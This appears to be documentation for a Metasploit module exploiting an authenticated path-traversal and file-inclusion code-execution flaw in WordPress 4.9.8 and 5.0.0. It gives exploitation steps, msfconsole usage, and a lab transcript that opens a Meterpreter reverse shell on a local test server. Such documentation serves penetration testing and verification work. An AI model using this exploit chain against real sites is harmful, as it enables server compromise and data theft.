Shelby Pace
2.1 KiB
2.1 KiB
On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion. An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.
Exploitation Steps
- Upload an image containing PHP code
- Edit the
_wp_attached_fileentry frommeta_input$_POST array to specify an arbitrary path - Perform the Path Traversal by using the
crop-imageWordpress function - Perform the Local File Inclusion by creating a new WordPress post and set
_wp_page_templatevalue to the cropped image. The post willinclude()our image containing PHP code.
When visiting the post created by the attacker it is possible to obtain code execudion.
More details can be found on RIPS Technology Blog.
Verification Steps
Confirm that functionality works:
- Start
msfconsole use exploit/multi/http/wp_crop_rce- Set the
RHOST - Set
USERNAMEandPASSWORD - Set
LHOSTandLPORT - Run the exploit:
run - Confirm you have now a meterpreter session
Scenarios
Ubuntu 18.04 running WordPress 4.9.8
msf5 > use exploit/multi/http/wp_crop_rce
msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/wp_crop_rce) > set username author
username => author
msf5 exploit(multi/http/wp_crop_rce) > set password author
password => author
msf5 exploit(multi/http/wp_crop_rce) > run
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Authenticating with WordPress using author:author...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Checking crop library
[*] Uploading payload
[+] Image uploaded
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (38247 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
Meterpreter : php/linux